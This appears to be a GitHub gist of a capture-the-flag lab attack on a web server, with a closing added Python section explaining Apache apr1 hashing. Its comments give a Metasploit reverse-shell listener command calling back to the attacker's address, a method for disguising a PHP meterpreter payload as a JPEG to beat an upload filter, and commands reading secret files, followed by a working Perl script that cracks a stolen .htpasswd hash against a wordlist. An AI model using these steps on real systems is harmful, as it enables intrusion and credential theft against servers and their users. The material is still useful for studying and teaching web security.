@rdapaz
Last active September 13, 2018 09:45
Hacking .htpasswd
#!/usr/bin/perl
#developer:$apr1$Wv63/0xM$6hoeCDM.YzSITNZYFf6Bd/
#
# kali ip = 10.10.1.190
# exploit vm ip = 10.10.1.59
# msfconsole -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 10.10.1.190; set LPORT 6000; exploit"
# use msfvenom to generate php payload, copy it to windows and use Winhex to insert binary code at the commencement of the file so that it resembles a jpeg
# xxd exploit.php | head -n 1
# 00000000: ffd8 ffde 0a2f 2a3c 3f70 6870 202f 2a2a ...../*<?php /**
# cd ../private
# pwd => /var/www/html/private
# cat secret.txt => flag 2
# cat .htpasswd
#100400/r-------- 108 fil 2018-08-11 13:34:58 +0800 .htaccess
#100400/r-------- 49 fil 2018-08-11 13:35:01 +0800 .htpasswd
#100400/r-------- 0 fil 2018-08-11 13:34:52 +0800 index.html
#100400/r-------- 73 fil 2018-08-11 13:34:52 +0800 secret.txt
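use v5.10;
use strict;
use warnings;
my $match = '$apr1$Wv63/0xM$6hoeCDM.YzSITNZYFf6Bd/';
# openssl picks a random salt unless told otherwise, so reuse the salt
# stored in $match (the field between the second and third '$').
my $salt = (split /\$/, $match)[2];
open(my $fh, '<', '/root/Desktop/rockyou.txt') or die $!;
my $count = 0;
while (my $word = <$fh>) {
    chomp $word;
    next if $word eq '' or $word =~ /^-/;   # openssl would read these as options
    # List-form pipe open: the candidate is never interpreted by a shell.
    open(my $ssl, '-|', 'openssl', 'passwd', '-apr1', '-salt', $salt, $word) or die $!;
    my $str = <$ssl> // '';
    close $ssl;
    chomp $str;                             # openssl appends a newline
    $count++;
    say join '::', $count, $word, $str;
    if ($str eq $match) {
        say "$word is the password!";
        last;                               # Perl's loop exit is 'last', not 'break'
    }
}
close $fh;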
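
#!/usr/bin/perl
# Hash the same cleartext ten times: openssl draws a fresh random salt on
# every call, so no two outputs match (see the output that follows).
use v5.10;
my $clear = "password123";
for (my $i = 0; $i < 10; $i++) {
    my $str = `openssl passwd -apr1 $clear` or die $!;
    print $str;
}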
$apr1$.mCyx5Ct$.aABlBNJrgTAbkqZ1DHzV1
$apr1$Ra4kFt2k$ySEOsjOdvMuHJ8x1G8gh30
$apr1$UFviX9ph$CM7xkfi.eDT/feXwd7KSk.
$apr1$/XeHH8Xm$0oO/FvFkOlc3PMM7jteN41
$apr1$XgcBtQNe$ssiEM.p0tUaS0GAwI9uEi.
$apr1$6yfckfe9$2sIIJL/CB3uP9eYs5vp8u0
$apr1$vFvro1jk$OilLbryMNPanEyxkmy4150
$apr1$XlaoG12j$W04snMAmfYmdTn2b/EmzI0
$apr1$3g7P93Rm$IPQtpgv44gmIL/o./sgWj0
$apr1$ZDrtXutx$agcugaEMxtBaiERzZq0ZE1
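
Added example, not part of the original gist: a pure-Python apr1 implementation showing why a candidate can only be compared against a stored `.htpasswd` hash after the salt is read back out of that hash. The names `apr1`, `verify` and `SAMPLES` are my own, and the two sample hashes are taken from the output listed above for `password123`.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def apr1(password: str, salt: str) -> str:
    """Apache apr1 (MD5-crypt variant) hash of password under an explicit salt."""
    pw, s = password.encode(), salt.encode()[:8]
    alt = hashlib.md5(pw + s + pw).digest()
    ctx = hashlib.md5(pw + b"$apr1$" + s)
    for n in range(len(pw), 0, -16):        # alt digest, one byte per password byte
        ctx.update(alt[:min(16, n)])
    i = len(pw)
    while i:                                # one byte per bit of the password length
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                   # fixed 1000 rounds, no tunable cost
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(s)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = final[a] << 16 | final[b] << 8 | final[c]
        for _ in range(4):                  # 24 bits -> four base-64 characters
            out += ITOA64[v & 0x3F]
            v >>= 6
    out += ITOA64[final[11] & 0x3F] + ITOA64[final[11] >> 6]
    return f"$apr1${salt[:8]}${out}"

def verify(stored: str, candidate: str) -> bool:
    """Check a candidate the way the server does: reuse the salt inside `stored`."""
    _, scheme, salt, _ = stored.split("$")
    if scheme != "apr1":
        raise ValueError("not an apr1 hash")
    return hmac.compare_digest(apr1(candidate, salt), stored)

# Two of the hashes listed above for "password123": same password, different salts.
SAMPLES = ["$apr1$.mCyx5Ct$.aABlBNJrgTAbkqZ1DHzV1", "$apr1$Ra4kFt2k$ySEOsjOdvMuHJ8x1G8gh30"]

if __name__ == "__main__":
    for h in SAMPLES:
        print(h, verify(h, "password123"), verify(h, "password124"))
```

The fixed 1000 MD5 rounds are why apr1 entries fall quickly to wordlists; `htpasswd -B` stores bcrypt with an adjustable cost instead.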